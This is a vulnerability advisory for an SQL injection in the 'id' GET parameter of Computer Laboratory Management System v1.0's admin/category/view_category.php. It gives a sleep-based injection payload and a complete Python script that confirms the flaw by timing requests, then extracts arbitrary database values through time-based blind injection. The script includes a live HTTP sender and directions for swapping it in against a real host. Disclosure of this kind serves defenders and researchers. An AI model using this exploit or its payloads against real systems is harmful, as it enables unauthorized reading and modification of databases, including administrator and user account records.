BUG_Author: K1ngd0m3
Affected version: Computer Laboratory Management System v1.0
Vendor: https://www.sourcecodester.com/
Vulnerability File: admin/category/view_category.php
Description: Computer Laboratory Management System v1.0 is vulnerable to SQL injection via admin/category/view_category.php. The GET parameter "id" is not handled correctly: as shown in the screenshot, at line 4 of the source file it is used in the SQL query without being properly filtered, resulting in a SQL injection vulnerability. An attacker can use it to read or modify database contents, including the administrator's and other users' account records.
The GET parameter 'id' is vulnerable to SQL injection.
Payload1: ?id=4'and+sleep(10)%23
The server's response is delayed by ten seconds, confirming the injection. Because the delay is attacker-controlled, database contents can be retrieved through time-based blind SQL injection. Compare the timing against a plain baseline request and a sleep(0) control, and repeat with a different sleep value, so that ordinary network latency is not mistaken for injection.
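The following script, added here as an example and not part of the sourcecodester project or the original advisory, turns the sleep-based check above into a repeatable test and shows how data is recovered through the delay: it times a baseline request, the advisory's sleep payload and a sleep(0) control, then extracts the result of an arbitrary SQL expression byte by byte with a binary search over ascii(substring(...)). The TARGET URL is an assumed local deployment path; FAKE_VERSION and fake_send() are a constructed stand-in for a MySQL-backed server (it only understands version()) so the script runs offline, and http_send() is the sender to use against a real host.

```python
"""Time-based blind SQL injection check and extraction for a GET parameter.

Added example for this advisory; not code from the affected project.
TARGET is an assumed path; fake_send()/FAKE_VERSION are a constructed offline
stand-in for the vulnerable page backed by MySQL.
"""
import re
import time
import urllib.error
import urllib.request
from urllib.parse import parse_qs, quote, urlparse

# Assumed local deployment path; adjust to the real host.
TARGET = "http://localhost/admin/category/view_category.php"
# Characters left unencoded so the URL reads like the advisory's payload.
SAFE = "'()=,<>"


def build_payload(base_id, delay):
    """Same shape as the advisory's payload: 4'and sleep(10)#"""
    return f"{base_id}'and sleep({delay})#"


def inject_url(base_url, injected_id):
    # '#' must be percent-encoded (%23) or the client treats it as a fragment.
    return f"{base_url}?id={quote(injected_id, safe=SAFE)}"


def http_send(url, timeout=60):
    """Real sender: the body is irrelevant, only the elapsed time matters."""
    try:
        urllib.request.urlopen(url, timeout=timeout).read()
    except urllib.error.HTTPError:
        pass  # a 500 from a broken query is still a timed response


def timed(send, url):
    start = time.perf_counter()
    send(url)
    return time.perf_counter() - start


def is_time_injectable(send, base_url, base_id="4", delay=5, jitter=1.0):
    """True only if sleep(delay) adds about `delay` seconds AND sleep(0) adds
    nothing; the control request stops a slow page or network jitter from
    being mistaken for injection."""
    baseline = timed(send, f"{base_url}?id={base_id}")
    slowed = timed(send, inject_url(base_url, build_payload(base_id, delay)))
    control = timed(send, inject_url(base_url, build_payload(base_id, 0)))
    return (slowed - baseline) >= delay - jitter and (control - baseline) < jitter


def extract_string(send, base_url, expr, base_id="4", max_len=32, delay=2):
    """Recover the value of a SQL expression one byte at a time.

    Each byte is found by binary search over ascii(substring(expr,pos,1)),
    seven timed requests per byte. MySQL returns '' past the end of the
    string and ascii('') is 0, which ends the loop."""
    out = ""
    for pos in range(1, max_len + 1):
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            cond = f"if(ascii(substring(({expr}),{pos},1))>{mid},sleep({delay}),0)"
            url = inject_url(base_url, f"{base_id}' and {cond}#")
            if timed(send, url) >= delay / 2:
                lo = mid + 1  # the byte is greater than mid
            else:
                hi = mid
        if lo == 0:
            break
        out += chr(lo)
    return out


# ---- constructed offline stand-in for the vulnerable page -------------------
FAKE_VERSION = "8.0.33"  # constructed value standing in for version()
_COND = re.compile(
    r"if\(ascii\(substring\(\(version\(\)\),(\d+),1\)\)>(\d+),sleep\(([\d.]+)\),0\)")
_SLEEP = re.compile(r"sleep\(([\d.]+)\)")


def fake_send(url):
    """Mimics the vulnerable page: the id value reaches the query unescaped,
    so any sleep() inside it is honoured."""
    value = parse_qs(urlparse(url).query).get("id", [""])[0]
    m = _COND.search(value)
    if m:
        pos, n, d = int(m[1]), int(m[2]), float(m[3])
        ch = FAKE_VERSION[pos - 1] if pos <= len(FAKE_VERSION) else ""
        if (ord(ch) if ch else 0) > n:
            time.sleep(d)
        return
    m = _SLEEP.search(value)
    if m:
        time.sleep(float(m[1]))


if __name__ == "__main__":
    print("injectable:", is_time_injectable(fake_send, TARGET, delay=1, jitter=0.3))
    print("version():", extract_string(fake_send, TARGET, "version()", delay=0.2))
```

Against a live target swap fake_send for http_send and raise `delay` to a few seconds, since the threshold of half the delay has to stay well above the server's normal response time; the sleep(0) control in is_time_injectable is what distinguishes a genuinely injected sleep from a page that is simply slow.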